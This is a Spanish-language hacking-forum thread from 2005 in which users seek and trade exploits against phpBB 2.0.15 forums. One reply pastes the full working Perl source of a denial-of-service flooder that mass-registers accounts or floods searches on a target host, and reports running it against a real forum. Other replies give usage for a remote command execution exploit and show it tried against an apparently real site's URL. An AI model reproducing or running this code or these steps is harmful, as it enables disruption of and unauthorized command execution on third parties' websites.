elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 11:46  


Tema destacado: ¡Aprende hacking con práctica! - WarZone, el wargame de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Exploit phpbb 2.0.15
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Exploit phpbb 2.0.15  (Leído 5,105 veces)
darksteel-

Desconectado Desconectado

Mensajes: 142


¡Amo YaBB SE!


Ver Perfil
Exploit phpbb 2.0.15
« en: 2 Julio 2005, 00:19 »

Alguien tiene el Exploit phpbb 2.0.15 en C  ya que lo he visto en PY, PL pero no en C es el de viwtopic .

Gracias
En línea

easycreations.org
Jec


Desconectado Desconectado

Mensajes: 1.150


Not-Public


Ver Perfil WWW
Re: Exploit phpbb 2.0.15
« Respuesta #1 en: 2 Julio 2005, 01:30 »

vi uno no recuerdo donde en view profile me parece, era uno .php
busca por google que de seguro lo encuentras
un saludo
En línea

Conthackto.com.mx
Ture

Desconectado Desconectado

Mensajes: 16



Ver Perfil
Re: Exploit phpbb 2.0.15
« Respuesta #2 en: 2 Julio 2005, 23:42 »

hay uno en perl pero no se luego que comandos poner

http://www.packetstormsecurity.org/0506-exploits/phpbb2_0_15.pl.txt
si alguno se tira el pisto se agradecería :)
En línea
sikik


Desconectado Desconectado

Mensajes: 664


Jo sóc jo i la meva circumstància.


Ver Perfil
Re: Exploit phpbb 2.0.15
« Respuesta #3 en: 3 Julio 2005, 02:51 »

es muy facil poner
Código:
perl phpbb2_0_15.pl [www.victima.gov/phpbb2/viwtopic?=123
te saldra
phpbb2.5.15>
y le metes los comando que quieras

salu2
En línea

"Social Engineer -> Because there is no patch for human stupidity".
"Però qui s'ha inclinat sobre l'abisme, qui ha vist, patirà per sempre la temptació de tornar un altre cop a aquest punt negre en el qual les tenebres il·luminen(...)"
Warning: shell_exec() has been disabled for security reasons at line 274.
darksteel-

Desconectado Desconectado

Mensajes: 142


¡Amo YaBB SE!


Ver Perfil
Re: Exploit phpbb 2.0.15
« Respuesta #4 en: 3 Julio 2005, 03:52 »

es muy facil poner
Código:
perl phpbb2_0_15.pl [www.victima.gov/phpbb2/viwtopic?=123
te saldra
phpbb2.5.15>
y le metes los comando que quieras

salu2

ai me sale eso pero a la que escribo un comando, tarda y no devuelve nada.
En línea

easycreations.org
Jec


Desconectado Desconectado

Mensajes: 1.150


Not-Public


Ver Perfil WWW
Re: Exploit phpbb 2.0.15
« Respuesta #5 en: 3 Julio 2005, 04:49 »

entonces no es vulnerable...
en el código fuente del xpl vienen las espesificaciones de como usarlo, de hecho en la mayoria....
un saludo
En línea

Conthackto.com.mx
parisnet

Desconectado Desconectado

Mensajes: 61


Ver Perfil WWW
Re: Exploit phpbb 2.0.15
« Respuesta #6 en: 3 Julio 2005, 13:31 »

 Exploit: http://www.packetstormsecurity.org/0506-exploits/phpbb2_0_15.pl.txt (phpbb2.pl)
 Perl: ActivePerl-5.8.7.813

??? Error:

Código:
C:\perl\bin>perl phpbb2.pl
syntax error at phpbb2.pl line 2, near "HTML>"
"use" not allowed in expression at phpbb2.pl line 24, at end of line
BEGIN not safe after errors--compilation aborted at phpbb2.pl line 25.
En línea

parisnet

Desconectado Desconectado

Mensajes: 61


Ver Perfil WWW
Re: Exploit phpbb 2.0.15
« Respuesta #7 en: 3 Julio 2005, 13:35 »

Código:
#!/usr/bin/perl
##  Name: NsT-phpBBDoS (Perl Version)
##  Copyright: Neo Security Team
##  Author: HaCkZaTaN
##  Ported: g30rg3_x
##  Date: 20/06/05
##  Description: NsT-phpBB DoS By HackZatan Ported tu perl By

g30rg3_x
##               A Simple phpBB Registration And Search DoS

Flooder.
##
##  g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
##  [+]
##  [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
##  [+] ported to Perl By g30rg3_x
##  [+] Neo Security Team
##  [+]
##  [+] Host |without http://www.| victimshost.com
##  [+] Path |example. /phpBB2/ or /| /phpBB2/
##  [+] Flood Type |1=Registration 2=Search| 1
##  [+] ..........................................................
##  [+] ..........................................................
##  [+] ..........................................................
##  [+] ..............................................
##  [+] The Socket Can't Connect To The Desired Host or the Host is

MayBe DoSed
##  g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users

I have created"

use IO::Socket;

## Initialized X
$x = 0;

## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team

);
print q(Host |without http://www.| );
$host = <STDIN>;
chop ($host);

print q(Path |example. /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);

print q(Flood Type |1 = Registration, 2 = Search| );
$type = <STDIN>;
chop ($type);

## If Type Is Equals To 1 or Registration
if($type == 1){

## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{

## Building User in base X
$uname = "username=NsT__" . "$x";

## Building User Mail in base X
$umail = "&email=NsT__" . "$x";

## Final String to Send
$postit = "$uname"."$umail"."%

40neosecurityteam.net&new_password=0123456&password_confirm=0123456

&icq=&aim=N%

2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&

viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attach

sig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&sty

le=2&timezone=0&dateformat=D+M+d%2C+Y+g%

3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nThe Socket Can't Connect To The Desired Host or the Host is

MayBe DoSed: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Register a User in

phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg,

image/pjpeg, application/x-shockwave-flash, application/vnd.ms-

excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;

rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "." for every loop
syswrite STDOUT, ".";

## Increment X in One for every Loop
$x++;
}

## If Type Is Equals To 2 or Search
}
elsif ($type == 2){

## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit =

"search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_term

s=any&search_author=&search_forum=-

1&search_time=0&search_fields=msgonly&search_cat=-

1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nThe Socket Can't Connect To The Desired Host or the Host is

MayBe DoSed: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Send A BD Search Into

phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept:

text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text

/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;

rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "." for every loop
syswrite STDOUT, ".";

## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Option not Allowed O_o???\n";
}

Ese lo probe y rula  ;D

Código:
C:\perl\bin>perl phpbb2015.pl

NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team

Host |without http://www.| censurado.com.ar
Path |example. /phpBB2/ or /| /foro/
Flood Type |1 = Registration, 2 = Search| 2
................................................................................
................................................................................
................................................................................
................................................................................
En línea

J-a-V-i-T-o

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Exploit phpbb 2.0.15
« Respuesta #8 en: 4 Julio 2005, 00:05 »

Buenas. Probé el phpbb2_0_15.pl y no me anda, o algo falta:
[root@www inet]# perl phpbb2_0_15.pl http://www.perc.ca/phpBB2/viewtopic.php?t=794
www.perc.ca - 80 - phpBB2/viewtopic.php?t=794
phpBB2.0.15> ls
phpBB2.0.15>

Como verán no aparece respuesta al comando "ls" y ya lo probé con varias páginas.
« Última modificación: 4 Julio 2005, 00:17 por J-a-V-i-T-o » En línea
ChElAnO

Desconectado Desconectado

Mensajes: 129


Ver Perfil
Re: Exploit phpbb 2.0.15
« Respuesta #9 en: 6 Julio 2005, 17:42 »

parisnet lo que tu posteaste es un exploit solo para flodear el phpbb,

ellos tratan de ejecutar comandos remotamente,

tambien probe el phpbb2_0_15.pl

lastima que no se perl :=(

salu2
En línea
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 17.227


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Exploit phpbb 2.0.15
« Respuesta #10 en: 6 Julio 2005, 22:38 »

phpBB 2.0.15 arbitrary command execution eXploit
http://www.frsirt.com/exploits/20050701.phpbb2015.py.php
En línea

"elhacker.net es único, por eso no fabrica para otras marcas"  - Prohibido prohibir

ZoW

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Exploit phpbb 2.0.15
« Respuesta #11 en: 7 Julio 2005, 20:04 »

ese como se usa el brujo  ????


-salu2-
En línea
Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Re: Exploit phpbb 2.0.15
« Respuesta #12 en: 7 Julio 2005, 20:18 »

Si lo leyeras un poco te dieras cuenta que esta en Python y dice como usarlo.
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
Jec


Desconectado Desconectado

Mensajes: 1.150


Not-Public


Ver Perfil WWW
Re: Exploit phpbb 2.0.15
« Respuesta #13 en: 7 Julio 2005, 21:59 »

por cierto, hace ya tiempo salio la versión .16 con varios bugs parchados, entre ellos los de Dos y otros más...
un saludo
En línea

Conthackto.com.mx
ZoW

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Exploit phpbb 2.0.15
« Respuesta #14 en: 8 Julio 2005, 17:44 »

pero ese q onad como se guarda se compila??
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines